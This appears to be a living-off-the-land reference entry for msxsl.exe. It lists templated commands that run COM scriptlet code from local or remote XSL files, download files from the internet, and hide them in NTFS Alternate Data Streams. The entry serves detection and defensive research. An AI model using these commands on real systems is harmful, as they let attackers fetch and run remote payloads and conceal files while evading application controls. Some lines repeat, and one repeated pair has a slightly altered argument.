Command line utility used to perform XSL transformations.
Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe {PATH:.xml} {PATH:.xsl}
Local execution of script stored in XSL file.
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}
Local execution of remote script stored in XSL script stored as an XML file.
Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe {PATH:.xml} {PATH:.xsl}
Local execution of script stored in XSL file.
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}
Local execution of remote script stored in XSL script stored as an XML file.
Using remote XML and XSL files, save the transformed XML file to disk.
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}
Download a file from the internet and save it to disk.
Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name
Download a file from the internet and save it to an NTFS Alternate Data Stream.